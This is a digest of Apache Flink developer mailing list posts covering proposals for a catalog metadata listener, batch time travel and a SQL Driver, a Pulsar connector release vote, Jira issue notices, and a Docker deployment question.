> > > such as drop tables and alter tables cannot be rolled back, Flink
> cannot
> > > handle these exceptions for the listener. It will cause the operation
> to
> > > exit if an exception is thrown, but the executed DDL will be
> successful.
> > >
> > > > 2. What is the order of execution? Is the listener executed first or
> > are
> > > specific operations executed first?  If I want to perform DDL
> permission
> > > verification(such as integrating with Ranger based on the listener) ,
> is
> > > that possible?
> > >
> > > The listener will be notified to report catalog modification after DDLs
> > are
> > > successful, so you can not do permission verification for DDL in the
> > > listener. As mentioned above, Flink will not roll back the DDL even
> when
> > > the listener throws an exception. I think permission verification is
> > > another issue and can be discussed separately.
> > >
> > >
> > > Best,
> > > Shammon FY
> > >
> > > On Tue, May 30, 2023 at 1:07 AM Feng Jin 
> wrote:
> > >
> > > > Hi, Shammon
> > > >
> > > > Thanks for driving this Flip, [Support Customized Job Meta Data
> > Listener]
> > > > will  make it easier for Flink to collect lineage information.
> > > > I fully agree with the overall solution and have a small question:
> > > >
> > > > 1. Will an exception thrown by the listener affect the normal
> execution
> > > > process?
> > > >
> > > > 2. What is the order of execution? Is the listener executed first or
> > are
> > > > specific operations executed first?  If I want to perform DDL
> > permission
> > > > verification(such as integrating with Ranger based on the 

Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener

2023-05-31 Thread yuxia
Hi, Shammon.
I mean, do we need to include the new database after the alter in
AlterDatabaseEvent, so that the listener can know what has been modified for
the database? Or does the listener not need to care about the actual modification?
Also, I'm wondering whether AlterDatabaseEvent needs to include the ignoreIfNotExists
method, since the alter database operation doesn't have syntax like 'alter
database if exists xxx'.

Best regards,
Yuxia

- Original Message -
From: "Shammon FY" 
To: "dev" 
Sent: Wednesday, May 31, 2023 2:55:26 PM
Subject: Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener

Hi yuxia

Thanks for your input. The `AlterDatabaseEvent` extends
`DatabaseModificationEvent` which has the original database.

Best,
Shammon FY

On Wed, May 31, 2023 at 2:24 PM yuxia  wrote:

> Thanks Shammon for driving it.
> The FLIP generally looks good to me. I only have one question.
> WRT AlterDatabaseEvent, IIUC, it'll contain the origin database name and
> the new CatalogDatabase after modified. Is it enough only pass the origin
> database name? Will it be better to contain the origin CatalogDatabase so
> that listener have ways to know what changes?
>
> Best regards,
> Yuxia
>
> - Original Message -
> From: "ron9 liu" 
> To: "dev" 
> Sent: Wednesday, May 31, 2023 11:36:04 AM
> Subject: Re: [DISCUSS] FLIP-294: Support Customized Job Meta Data Listener
>
> Hi, Shammon
>
> Thanks for driving this FLIP, It will enforce the Flink metadata capability
> from the platform produce perspective. The overall design looks good to me,
> I just have some small question:
> 1. Regarding CatalogModificationListenerFactory#createListener method, I
> think it would be better to pass Context as its parameter instead of two
> specific Object. In this way, we can easily extend it in the future and
> there will be no compatibility problems. Refer to
>
> https://github.com/apache/flink/blob/9880ba5324d4a1252d6ae1a3f0f061e4469a05ac/flink-table/flink-table-common/src/main/java/org/apache/flink/table/factories/DynamicTableFactory.java#L81
> 2. In FLIP, you mentioned that multiple Flink tables may refer to the same
> physical table, so does the Listener report this physical table repeatedly?
> 3. When registering a Listener object, will it connect to an external
> system such as Datahub? If the Listener object registration times out due
> to permission issues, it will affect the execution of all subsequent SQL,
> what should we do in this case?
>
> Best,
> Ron
>
> Shammon FY wrote on Wed, May 31, 2023 at 08:53:
>
> > Thanks Feng, the catalog modification listener is only used to report
> > read-only ddl information to other components or systems.
> >
> > > 1. Will an exception thrown by the listener affect the normal execution
> > process?
> >
> > Users need to handle the exception in the listener themselves. Many DDLs
> > such as drop tables and alter tables cannot be rolled back, Flink cannot
> > handle these exceptions for the listener. It will cause the operation to
> > exit if an exception is thrown, but the executed DDL will be successful.
> >
> > > 2. What is the order of execution? Is the listener executed first or
> are
> > specific operations executed first?  If I want to perform DDL permission
> > verification(such as integrating with Ranger based on the listener) , is
> > that possible?
> >
> > The listener will be notified to report catalog modification after DDLs
> are
> > successful, so you can not do permission verification for DDL in the
> > listener. As mentioned above, Flink will not roll back the DDL even when
> > the listener throws an exception. I think permission verification is
> > another issue and can be discussed separately.
> >
> >
> > Best,
> > Shammon FY
> >
> > On Tue, May 30, 2023 at 1:07 AM Feng Jin  wrote:
> >
> > > Hi, Shammon
> > >
> > > Thanks for driving this Flip, [Support Customized Job Meta Data
> Listener]
> > > will  make it easier for Flink to collect lineage information.
> > > I fully agree with the overall solution and have a small question:
> > >
> > > 1. Will an exception thrown by the listener affect the normal execution
> > > process?
> > >
> > > 2. What is the order of execution? Is the listener executed first or
> are
> > > specific operations executed first?  If I want to perform DDL
> permission
> > > verification(such as integrating with Ranger based on the listener) ,
> is
> > > that possible?
> > >
> > >
> > > Best,
> > > Feng
> > >
> > > On Fri, May 26, 2023 at 4:09 PM Shammon FY  wrote:
> > >
> > > > Hi devs,
> > > >
> > > > We would like to bring up a discussion about FLIP-294: Support
> > Customized
> > > > Job Meta Data Listener[1]. We have had several discussions with Jark
> > Wu,
> > > > Leonard Xu, Dong Lin, Qingsheng Ren and Poorvank about the functions
> > and
> > > > interfaces, and thanks for their valuable advice.
> > > > The overall job and connector information is divided into metadata
> and
> > > > lineage, this FLIP focuses on metadata and lineage will be discussed
> in
> > > > another FLIP in the 

Re: [VOTE] Release flink-connector-pulsar 3.0.1, release candidate #1

2023-05-31 Thread Jing Ge
+1(non-binding)

- verified sign
- verified hash
- checked repos
- checked tag. NIT: the tag link should be:
https://github.com/apache/flink-connector-pulsar/releases/tag/v3.0.1-rc1
- reviewed PR. NIT: left a comment.

Best regards,
Jing

On Wed, May 31, 2023 at 11:16 PM Neng Lu  wrote:

> +1
>
> I verified
>
> + the release now can communicate with Pulsar using OAuth2 auth plugin
> + build from source and run unit tests with JDK 17 on macOS M1Max
>
>
> On Wed, May 31, 2023 at 4:24 AM Zili Chen  wrote:
>
> > +1
> >
> > I verified
> >
> > + LICENSE and NOTICE present
> > + Checksum and GPG sign matches
> > + No unexpected binaries in the source release
> > + Build from source and run unit tests with JDK 17 on macOS M1
> >
> > On 2023/05/25 16:18:51 Leonard Xu wrote:
> > > Hey all,
> > >
> > > Please review and vote on the release candidate #1 for the version
> 3.0.1
> > of the
> > > Apache Flink Pulsar Connector as follows:
> > >
> > > [ ] +1, Approve the release
> > > [ ] -1, Do not approve the release (please provide specific comments)
> > >
> > > The complete staging area is available for your review, which includes:
> > > JIRA release notes [1],
> > > The official Apache source release to be deployed to dist.apache.org
> > [2], which are signed with the key with
> > fingerprint5B2F6608732389AEB67331F5B197E1F1108998AD [3],
> > > All artifacts to be deployed to the Maven Central Repository [4],
> > > Source code tag v3.0.1-rc1 [5],
> > > Website pull request listing the new release [6].
> > > The vote will be open for at least 72 hours. It is adopted by majority
> > approval, with at least 3 PMC affirmative votes.
> > >
> > >
> > > Best,
> > > Leonard
> > >
> > > [1]
> >
> https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12315522&version=12352640
> > > [2]
> >
> https://dist.apache.org/repos/dist/dev/flink/flink-connector-pulsar-3.0.1-rc1/
> > > [3] https://dist.apache.org/repos/dist/release/flink/KEYS
> > > [4]
> > https://repository.apache.org/content/repositories/orgapacheflink-1641/
> > > [5] https://github.com/apache/flink-connector-pulsar/tree/v3.0.1-rc1
> > > [6] https://github.com/apache/flink-web/pull/655
> > >
> > >
> >
>


Re: [DISCUSS] FLIP-308: Support Time Travel In Batch Mode

2023-05-31 Thread Jing Ge
Hi Feng,

Thanks for the proposal! Very interesting feature. Would you like to add
the thoughts from your previous email about why SupportsTimeTravel
was rejected to the FLIP? This will help readers understand the
context (in the future).

We always directly add overloaded methods to Catalog for new
requirements, which makes the interface bloated. Just out of curiosity,
does it make sense to introduce some DSL design? Like
Catalog.getTable(tablePath).on(timeStamp),
Catalog.getTable(tablePath).current() for the most current version, and
more room for further extension like timestamp ranges, etc. I haven't read
all the source code yet and I'm not sure if it is possible. But a
design like this would keep the Catalog API lean, and the API/DSL would be
self-describing and easier to use.
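
Purely to illustrate the suggested shape (a hypothetical sketch; TableLookup is
invented here and is not an existing Flink interface):

```
// Hypothetical DSL sketch for the idea above.
public interface TableLookup {
    CatalogBaseTable current();                 // the most current version
    CatalogBaseTable on(long timestampMillis);  // the snapshot as of a timestamp
}

// Usage, mirroring the suggestion:
// CatalogBaseTable table = catalog.getTable(tablePath).on(timestamp);
```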

Best regards,
Jing


On Wed, May 31, 2023 at 12:08 PM Krzysztof Chmielewski <
krzysiek.chmielew...@gmail.com> wrote:

> OK, on second thought I'm retracting my previous statement about the Catalog
> changes you proposed.
> I do see a benefit for the Delta connector with this change, and I see
> why this could be coupled with the Catalog.
>
> Delta Connector's SQL support also ships a Delta Catalog implementation for
> Flink.
> For the Delta Catalog, table schema information is fetched from the underlying
> _delta_log and not stored in the metastore. For time travel we actually had a
> problem: if we wanted to time travel back to some old version
> where the schema was slightly different, then we would have a conflict, since
> the Catalog would return the current schema and not how it was for version X.
>
> With your change, our Delta Catalog can actually fetch the schema for version X
> and send it to DeltaTableFactory. Currently, the Catalog can fetch only the current
> version. What we would also need, however, is the version (number/timestamp) of
> this table passed to the DynamicTableFactory, so we could properly set up the Delta
> standalone library.
>
> Regards,
> Krzysztof
>
> On Wed, May 31, 2023 at 10:37, Krzysztof Chmielewski <
> krzysiek.chmielew...@gmail.com> wrote:
>
> > Hi,
> > happy to see such a feature.
> > Small note from my end regarding Catalog changes.
> >
> > TL;DR
> > I don't think it is necessary to delegate this feature to the catalog. I
> > think that since "timetravel" is per job/query property, its should not
> be
> > coupled with the Catalog or table definition. In my opinion this is
> > something that DynamicTableFactory only has to know about. I would rather
> > see this feature as it is - SQL syntax enhancement but delegate clearly
> to
> > DynamicTableFactory.
> >
> > I've implemented timetravel feature for Delta Connector  [1]  using
> > current Flink API.
> > Docs are pending code review, but you can find them here [2] and examples
> > are available here [3]
> >
> > The timetravel feature that I've implemented is based on Flink Query
> > hints.
> > "SELECT * FROM sourceTable /*+ OPTIONS('versionAsOf' = '1') */"
> >
> > The " versionAsOf" (we also have 'timestampAsOf') parameter is handled
> not
> > by Catalog but by DyntamicTableFactory implementation for Delta
> connector.
> > The value of this property is passed to Delta standalone lib API that
> > returns table view for given version.
> >
> > I'm not sure how/if proposed change could benefit Delta connector
> > implementation for this feature.
> >
> > Thanks,
> > Krzysztof
> >
> > [1]
> >
> https://github.com/delta-io/connectors/tree/flink_table_catalog_feature_branch/flink
> > [2] https://github.com/kristoffSC/connectors/tree/FlinkSQL_PR_15-docs
> > [3]
> >
> https://github.com/delta-io/connectors/tree/flink_table_catalog_feature_branch/examples/flink-example/src/main/java/org/example/sql
> >
> >> On Wed, May 31, 2023 at 06:03, liu ron wrote:
> >
> >> Hi, Feng
> >>
> >> Thanks for driving this FLIP. Time travel is very useful for Flink
> >> integrating with data lake systems. I have one question: why is the
> >> implementation
> >> of TimeTravel delegated to the Catalog? Assuming that we use Flink to
> query
> >> a Hudi table with the time travel syntax, but we don't use the
> HudiCatalog,
> >> and instead register the Hudi table in the InMemoryCatalog, can we support
> >> time travel for the Hudi table in this case?
> >> In contrast, I think time travel should be bound to the connector instead of
> >> the Catalog, so the rejected alternative should be considered.
> >>
> >> Best,
> >> Ron
> >>
> >> yuxia wrote on Tue, May 30, 2023 at 09:40:
> >>
> >> > Hi, Feng.
> >> > Notice this FLIP only supports batch mode for time travel. Would it
> also
> >> > make sense to support stream mode to read a snapshot of the table
> as a
> >> > bounded stream?
> >> >
> >> > Best regards,
> >> > Yuxia
> >> >
> >> > - Original Message -
> >> > From: "Benchao Li" 
> >> > To: "dev" 
> >> > Sent: Monday, May 29, 2023 6:04:53 PM
> >> > Subject: Re: [DISCUSS] FLIP-308: Support Time Travel In Batch Mode
> >> >
> >> > # Can Calcite support this syntax ` VERSION AS OF`  ?
> >> >
> >> > This also depends on whether this is defined in 

Re: [VOTE] Release flink-connector-pulsar 3.0.1, release candidate #1

2023-05-31 Thread Neng Lu
+1

I verified

+ the release now can communicate with Pulsar using OAuth2 auth plugin
+ build from source and run unit tests with JDK 17 on macOS M1Max


On Wed, May 31, 2023 at 4:24 AM Zili Chen  wrote:

> +1
>
> I verified
>
> + LICENSE and NOTICE present
> + Checksum and GPG sign matches
> + No unexpected binaries in the source release
> + Build from source and run unit tests with JDK 17 on macOS M1
>
> On 2023/05/25 16:18:51 Leonard Xu wrote:
> > Hey all,
> >
> > Please review and vote on the release candidate #1 for the version 3.0.1
> of the
> > Apache Flink Pulsar Connector as follows:
> >
> > [ ] +1, Approve the release
> > [ ] -1, Do not approve the release (please provide specific comments)
> >
> > The complete staging area is available for your review, which includes:
> > JIRA release notes [1],
> > The official Apache source release to be deployed to dist.apache.org
> [2], which are signed with the key with
> fingerprint 5B2F6608732389AEB67331F5B197E1F1108998AD [3],
> > All artifacts to be deployed to the Maven Central Repository [4],
> > Source code tag v3.0.1-rc1 [5],
> > Website pull request listing the new release [6].
> > The vote will be open for at least 72 hours. It is adopted by majority
> approval, with at least 3 PMC affirmative votes.
> >
> >
> > Best,
> > Leonard
> >
> > [1]
> https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12315522&version=12352640
> > [2]
> https://dist.apache.org/repos/dist/dev/flink/flink-connector-pulsar-3.0.1-rc1/
> > [3] https://dist.apache.org/repos/dist/release/flink/KEYS
> > [4]
> https://repository.apache.org/content/repositories/orgapacheflink-1641/
> > [5] https://github.com/apache/flink-connector-pulsar/tree/v3.0.1-rc1
> > [6] https://github.com/apache/flink-web/pull/655
> >
> >
>


Re: [VOTE] Release flink-connector-pulsar 3.0.1, release candidate #1

2023-05-31 Thread Neng Lu
+1

I verified this release can communicate with Pulsar using OAuth2 authentication.

On 2023/05/25 16:18:51 Leonard Xu wrote:
> Hey all,
> 
> Please review and vote on the release candidate #1 for the version 3.0.1 of 
> the
> Apache Flink Pulsar Connector as follows:
> 
> [ ] +1, Approve the release
> [ ] -1, Do not approve the release (please provide specific comments)
> 
> The complete staging area is available for your review, which includes:
> JIRA release notes [1],
> The official Apache source release to be deployed to dist.apache.org [2], 
> which are signed with the key with 
> fingerprint 5B2F6608732389AEB67331F5B197E1F1108998AD [3],
> All artifacts to be deployed to the Maven Central Repository [4],
> Source code tag v3.0.1-rc1 [5],
> Website pull request listing the new release [6].
> The vote will be open for at least 72 hours. It is adopted by majority 
> approval, with at least 3 PMC affirmative votes.
> 
> 
> Best,
> Leonard
> 
> [1] 
> https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12315522&version=12352640
> [2] 
> https://dist.apache.org/repos/dist/dev/flink/flink-connector-pulsar-3.0.1-rc1/
> [3] https://dist.apache.org/repos/dist/release/flink/KEYS
> [4] https://repository.apache.org/content/repositories/orgapacheflink-1641/
> [5] https://github.com/apache/flink-connector-pulsar/tree/v3.0.1-rc1
> [6] https://github.com/apache/flink-web/pull/655
> 
> 


[jira] [Created] (FLINK-32231) libssl not found when running CI

2023-05-31 Thread Sergey Nuyanzin (Jira)
Sergey Nuyanzin created FLINK-32231:
---

 Summary: libssl not found when running CI
 Key: FLINK-32231
 URL: https://issues.apache.org/jira/browse/FLINK-32231
 Project: Flink
  Issue Type: Bug
  Components: Build System / CI
Affects Versions: 1.18.0, 1.16.3, 1.17.2
Reporter: Sergey Nuyanzin


{noformat}
--2023-05-31 19:10:13--  
http://security.ubuntu.com/ubuntu/pool/main/o/openssl1.0/libssl1.0.0_1.0.2n-1ubuntu5.12_amd64.deb
Resolving security.ubuntu.com (security.ubuntu.com)... 185.125.190.39, 
91.189.91.38, 91.189.91.39, ...
Connecting to security.ubuntu.com (security.ubuntu.com)|185.125.190.39|:80... 
connected.
HTTP request sent, awaiting response... 404 Not Found
2023-05-31 19:10:13 ERROR 404: Not Found.

{noformat}
e.g.
https://dev.azure.com/apache-flink/apache-flink/_build/results?buildId=49523=logs=bea52777-eaf8-5663-8482-18fbc3630e81=d6e79740-7cf7-5407-2e69-ca34c9be0efb=265



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


A few questions regarding Docker

2023-05-31 Thread Amir Hossein Sharifzadeh
Hi Flink Dev Team,

I am trying to create a Docker image. Before asking my question, let me
explain my application. My main (command) jar file:
1) Has dependencies on other jar files (they are all in the same directory).

2) Needs to read some arguments from a config file.

3) Generates an output file, and uses EmbeddedRocksDBStateBackend.

4) Is NOT doing anything with the SQL Client.

I am following the Docker documentation here

and will need to create a Dockerfile and a docker-compose.yml.

Question 1:
From docker-compose.yml, in the command section, what arguments should I
pass?
(I run the standalone application from the terminal:
java -Xms10g -Xmx28g -jar my-stream-processing-1.2.jar --config
stream.config)

Question 2:
Where to upload other jar dependencies?

Thank you very much.

Best,
Amir


Re: [DISCUSS] FLIP-316: Introduce SQL Driver

2023-05-31 Thread Paul Lam
Hi Biao,

Thanks for your comments!

> 1. Scope: is this FLIP only targeted for non-interactive Flink SQL jobs in
> Application mode? More specifically, if we use SQL client/gateway to
> execute some interactive SQLs like a SELECT query, can we ask flink to use
> Application mode to execute those queries after this FLIP?

Thanks for pointing it out. I think only DMLs would be executed via SQL Driver. 
I'll add the scope to the FLIP.

> 2. Deployment: I believe in YARN mode, the implementation is trivial as we
> can ship files via YARN's tool easily but for K8s, things can be more
> complicated as Shengkai said.


Your input is very informative. I’m thinking about using web submission,
but it requires exposing the JobManager port which could also be a problem
on K8s.

Another approach is to explicitly require a distributed storage to ship files,
but we may need a new deployment executor for that.

What do you think of these two approaches?

> 3. Serialization of SessionState: in SessionState, there are some
> unserializable fields
> like org.apache.flink.table.resource.ResourceManager#userClassLoader. It
> may be worthwhile to add more details about the serialization part.

I agree. That’s a missing part. But if we use ExecNodeGraph as Shengkai
mentioned, do we eliminate the need for serialization of SessionState?

Best,
Paul Lam

> On May 31, 2023, at 13:07, Biao Geng wrote:
> 
> Thanks Paul for the proposal! I believe it would be very useful for Flink
> users.
> After reading the FLIP, I have some questions:
> 1. Scope: is this FLIP only targeted for non-interactive Flink SQL jobs in
> Application mode? More specifically, if we use SQL client/gateway to
> execute some interactive SQLs like a SELECT query, can we ask flink to use
> Application mode to execute those queries after this FLIP?
> 2. Deployment: I believe in YARN mode, the implementation is trivial as we
> can ship files via YARN's tool easily but for K8s, things can be more
> complicated as Shengkai said. I have implemented a simple POC
> 
> based on SQL client before (i.e., consider the SQL client which supports
> executing a SQL file as the SQL driver in this FLIP). One problem I have
> met is how we ship SQL files (or the JobGraph) to the K8s side. Without
> such support, users have to modify the initContainer or rebuild a new K8s
> image every time to fetch the SQL file. Like the Flink K8s operator, one
> workaround is to utilize the Flink config (transforming the SQL file to an
> escaped string like Weihua mentioned), which will be converted to a
> ConfigMap, but K8s has a size limit on ConfigMaps (no larger than 1MB). Not sure
> if we have better solutions.
> 3. Serialization of SessionState: in SessionState, there are some
> unserializable fields
> like org.apache.flink.table.resource.ResourceManager#userClassLoader. It
> may be worthwhile to add more details about the serialization part.
> 
> Best,
> Biao Geng
> 
> Paul Lam wrote on Wed, May 31, 2023 at 11:49:
> 
>> Hi Weihua,
>> 
>> Thanks a lot for your input! Please see my comments inline.
>> 
>>> - Is SQLRunner the better name? We use this to run a SQL Job. (Not
>> strong,
>>> the SQLDriver is fine for me)
>> 
>> I’ve thought about SQL Runner but picked SQL Driver for the following
>> reasons FYI:
>> 
>> 1. I have a PythonDriver doing the same job for PyFlink [1]
>> 2. A Flink program's main class is sort of like a Driver in JDBC, which
>> translates SQL into
>>    database-specific languages.
>> 
>> In general, I’m +1 for SQL Driver and +0 for SQL Runner.
>> 
>>> - Could we run SQL jobs using SQL in strings? Otherwise, we need to
>> prepare
>>> a SQL file in an image for Kubernetes application mode, which may be a
>> bit
>>> cumbersome.
>> 
>> Do you mean to pass the SQL string as a configuration or a program argument?
>> 
>> I thought it might be convenient for testing purposes, but not recommended
>> for production,
>> since Flink SQL could be complicated and involve lots of characters that
>> need to be escaped.
>> 
>> WDYT?
>> 
>>> - I noticed that we don't specify the SQLDriver jar in the
>> "run-application"
>>> command. Does that mean we need to perform automatic detection in Flink?
>> 
>> Yes! It’s like running a PyFlink job with the following command:
>> 
>> ```
>> ./bin/flink run \
>>  --pyModule table.word_count \
>>  --pyFiles examples/python/table
>> ```
>> 
>> The CLI determines if it’s a SQL job, if yes apply the SQL Driver
>> automatically.
>> 
>> 
>> [1]
>> https://github.com/apache/flink/blob/master/flink-python/src/main/java/org/apache/flink/client/python/PythonDriver.java
>> 
>> Best,
>> Paul Lam
>> 
>>> On May 30, 2023, at 21:56, Weihua Hu wrote:
>>> 
>>> Thanks Paul for the proposal.
>>> 
>>> +1 for this. It is valuable in improving ease of use.
>>> 
>>> I have a few questions.
>>> - Is SQLRunner the better name? We use this to run a SQL Job. (Not
>> strong,

[jira] [Created] (FLINK-32230) Deadlock in AWS Kinesis Data Streams connector

2023-05-31 Thread Antonio Vespoli (Jira)
Antonio Vespoli created FLINK-32230:
---

 Summary: Deadlock in AWS Kinesis Data Streams connector
 Key: FLINK-32230
 URL: https://issues.apache.org/jira/browse/FLINK-32230
 Project: Flink
  Issue Type: Bug
  Components: Connectors / AWS
Affects Versions: 1.17.1, 1.16.2, 1.15.4
Reporter: Antonio Vespoli
 Fix For: aws-connector-3.1.0, aws-connector-4.2.0


Connector calls to AWS Kinesis Data Streams can hang indefinitely without 
making any progress.

We suspect the root cause to be related to the SDK handling of exceptions, 
similarly to what observed in FLINK-31675.

We identified this deadlock on applications running on AWS Kinesis Data 
Analytics using the AWS Kinesis Data Streams connectors (with AWS SDK version 
2.20.32 as per FLINK-31675). The deadlock scenario is still the same as 
described in FLINK-31675. However, the Netty content-length exception does not 
appear when using the updated SDK version.

This issue only occurs for applications and streams in the AWS regions 
_ap-northeast-3_ and {_}us-gov-east-1{_}. We did not observe this issue in any 
other AWS region.

The issue happens sporadically and unpredictably. As per its nature, we do not 
have instructions for reproducing it.

Example of flame-graphs observed when the issue occurs:


{code:java}
root
java.lang.Thread.run:829
org.apache.flink.runtime.taskmanager.Task.run:568
org.apache.flink.runtime.taskmanager.Task.doRun:746
org.apache.flink.runtime.taskmanager.Task.restoreAndInvoke:932
org.apache.flink.runtime.taskmanager.Task.runWithSystemExitMonitoring:953
org.apache.flink.runtime.taskmanager.Task$$Lambda$1253/0x000800ecbc40.run:-1
org.apache.flink.streaming.runtime.tasks.StreamTask.invoke:753
org.apache.flink.streaming.runtime.tasks.StreamTask.runMailboxLoop:804
org.apache.flink.streaming.runtime.tasks.mailbox.MailboxProcessor.runMailboxLoop:203
org.apache.flink.streaming.runtime.tasks.StreamTask$$Lambda$907/0x000800bf7840.runDefaultAction:-1
org.apache.flink.streaming.runtime.tasks.StreamTask.processInput:519
org.apache.flink.streaming.runtime.io.StreamOneInputProcessor.processInput:65
org.apache.flink.streaming.runtime.io.AbstractStreamTaskNetworkInput.emitNext:110
org.apache.flink.streaming.runtime.io.checkpointing.CheckpointedInputGate.pollNext:159
org.apache.flink.streaming.runtime.io.checkpointing.CheckpointedInputGate.handleEvent:181
org.apache.flink.streaming.runtime.io.checkpointing.SingleCheckpointBarrierHandler.processBarrier:231
org.apache.flink.streaming.runtime.io.checkpointing.SingleCheckpointBarrierHandler.markCheckpointAlignedAndTransformState:262
org.apache.flink.streaming.runtime.io.checkpointing.SingleCheckpointBarrierHandler$$Lambda$1586/0x0008012c5c40.apply:-1
org.apache.flink.streaming.runtime.io.checkpointing.SingleCheckpointBarrierHandler.lambda$processBarrier$2:234
org.apache.flink.streaming.runtime.io.checkpointing.AbstractAlignedBarrierHandlerState.barrierReceived:66
org.apache.flink.streaming.runtime.io.checkpointing.AbstractAlignedBarrierHandlerState.triggerGlobalCheckpoint:74
org.apache.flink.streaming.runtime.io.checkpointing.SingleCheckpointBarrierHandler$ControllerImpl.triggerGlobalCheckpoint:493
org.apache.flink.streaming.runtime.io.checkpointing.SingleCheckpointBarrierHandler.access$100:64
org.apache.flink.streaming.runtime.io.checkpointing.SingleCheckpointBarrierHandler.triggerCheckpoint:287
org.apache.flink.streaming.runtime.io.checkpointing.CheckpointBarrierHandler.notifyCheckpoint:147
org.apache.flink.streaming.runtime.tasks.StreamTask.triggerCheckpointOnBarrier:1198
org.apache.flink.streaming.runtime.tasks.StreamTask.performCheckpoint:1241
org.apache.flink.streaming.runtime.tasks.StreamTaskActionExecutor$1.runThrowing:50
org.apache.flink.streaming.runtime.tasks.StreamTask$$Lambda$1453/0x00080128e840.run:-1
org.apache.flink.streaming.runtime.tasks.StreamTask.lambda$performCheckpoint$12:1253
org.apache.flink.streaming.runtime.tasks.SubtaskCheckpointCoordinatorImpl.checkpointState:300
org.apache.flink.streaming.runtime.tasks.RegularOperatorChain.prepareSnapshotPreBarrier:89
org.apache.flink.streaming.runtime.operators.sink.SinkWriterOperator.prepareSnapshotPreBarrier:165
org.apache.flink.connector.base.sink.writer.AsyncSinkWriter.flush:494
org.apache.flink.connector.base.sink.writer.AsyncSinkWriter.yieldIfThereExistsInFlightRequests:503
org.apache.flink.streaming.runtime.tasks.mailbox.MailboxExecutorImpl.yield:84
org.apache.flink.streaming.runtime.tasks.mailbox.TaskMailboxImpl.take:149
java.util.concurrent.locks.AbstractQueuedSynchronizer$ConditionObject.await:2211
java.util.concurrent.locks.LockSupport.parkNanos:234
jdk.internal.misc.Unsafe.park:-2 {code}
 



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (FLINK-32229) Implement metrics and logging for Initial implementation

2023-05-31 Thread Hong Liang Teoh (Jira)
Hong Liang Teoh created FLINK-32229:
---

 Summary: Implement metrics and logging for Initial implementation
 Key: FLINK-32229
 URL: https://issues.apache.org/jira/browse/FLINK-32229
 Project: Flink
  Issue Type: Sub-task
Reporter: Hong Liang Teoh


Add/ensure Kinesis-specific metrics for MillisBehindLatest/numRecordsIn are 
published.

List is here: 
https://cwiki.apache.org/confluence/display/FLINK/FLIP-33%3A+Standardize+Connector+Metrics



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (FLINK-32228) Bump testcontainers

2023-05-31 Thread Jira
João Boto created FLINK-32228:
-

 Summary: Bump testcontainers
 Key: FLINK-32228
 URL: https://issues.apache.org/jira/browse/FLINK-32228
 Project: Flink
  Issue Type: Improvement
  Components: Connectors / JDBC
Reporter: João Boto


Bump testcontainers version



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (FLINK-32227) Correct some grammar errors and optimize some code styles

2023-05-31 Thread zhihao song (Jira)
zhihao song created FLINK-32227:
---

 Summary: Correct some grammar errors and optimize some code styles
 Key: FLINK-32227
 URL: https://issues.apache.org/jira/browse/FLINK-32227
 Project: Flink
  Issue Type: Improvement
  Components: Runtime / Checkpointing
Reporter: zhihao song


When I was reading the latest version of Flink's checkpoint logic, I found and 
corrected some grammatical errors in the comments.



--
This message was sent by Atlassian Jira
(v8.20.10#820010)


[jira] [Created] (FLINK-32226) RestClusterClient leaks jobgraph file if submission fails

2023-05-31 Thread Chesnay Schepler (Jira)
Chesnay Schepler created FLINK-32226:


 Summary: RestClusterClient leaks jobgraph file if submission fails
 Key: FLINK-32226
 URL: https://issues.apache.org/jira/browse/FLINK-32226
 Project: Flink
  Issue Type: Bug
  Components: Client / Job Submission
Affects Versions: 1.17.0
Reporter: Chesnay Schepler
Assignee: Chesnay Schepler
 Fix For: 1.18.0, 1.17.2


{code:java}
submissionFuture
        .thenCompose(ignored -> jobGraphFileFuture)
        .thenAccept(
                jobGraphFile -> {
                    try {
                        Files.delete(jobGraphFile);
                    } catch (IOException e) {
                        LOG.warn("Could not delete temporary file {}.", jobGraphFile, e);
                    }
                });
{code}
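
The cleanup above is chained only onto the success path of submissionFuture, so a 
failed submission never deletes the temporary file. A minimal sketch of one 
possible fix (not the actual patch): swallow the submission outcome before the 
cleanup stage so the delete runs on both success and failure.

{code:java}
submissionFuture
        .handle((result, error) -> null) // proceed on success AND on failure
        .thenCompose(ignored -> jobGraphFileFuture)
        .thenAccept(
                jobGraphFile -> {
                    try {
                        Files.delete(jobGraphFile);
                    } catch (IOException e) {
                        LOG.warn("Could not delete temporary file {}.", jobGraphFile, e);
                    }
                });
{code}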




--
This message was sent by Atlassian Jira
(v8.20.10#820010)


Re: [VOTE] Release flink-connector-pulsar 3.0.1, release candidate #1

2023-05-31 Thread Zili Chen
+1

I verified

+ LICENSE and NOTICE present
+ Checksum and GPG sign matches
+ No unexpected binaries in the source release
+ Build from source and run unit tests with JDK 17 on macOS M1

On 2023/05/25 16:18:51 Leonard Xu wrote:
> Hey all,
> 
> Please review and vote on the release candidate #1 for the version 3.0.1 of 
> the
> Apache Flink Pulsar Connector as follows:
> 
> [ ] +1, Approve the release
> [ ] -1, Do not approve the release (please provide specific comments)
> 
> The complete staging area is available for your review, which includes:
> JIRA release notes [1],
> The official Apache source release to be deployed to dist.apache.org [2], 
> which is signed with the key with 
> fingerprint 5B2F6608732389AEB67331F5B197E1F1108998AD [3],
> All artifacts to be deployed to the Maven Central Repository [4],
> Source code tag v3.0.1-rc1 [5],
> Website pull request listing the new release [6].
> The vote will be open for at least 72 hours. It is adopted by majority 
> approval, with at least 3 PMC affirmative votes.
> 
> 
> Best,
> Leonard
> 
> [1] 
> https://issues.apache.org/jira/secure/ReleaseNote.jspa?projectId=12315522&version=12352640
> [2] 
> https://dist.apache.org/repos/dist/dev/flink/flink-connector-pulsar-3.0.1-rc1/
> [3] https://dist.apache.org/repos/dist/release/flink/KEYS
> [4] https://repository.apache.org/content/repositories/orgapacheflink-1641/
> [5] https://github.com/apache/flink-connector-pulsar/tree/v3.0.1-rc1
> [6] https://github.com/apache/flink-web/pull/655
> 
> 


[jira] [Created] (FLINK-32225) merge task deployment related fields into a new configuration

2023-05-31 Thread Weihua Hu (Jira)
Weihua Hu created FLINK-32225:
-

 Summary: merge task deployment related fields into a new 
configuration 
 Key: FLINK-32225
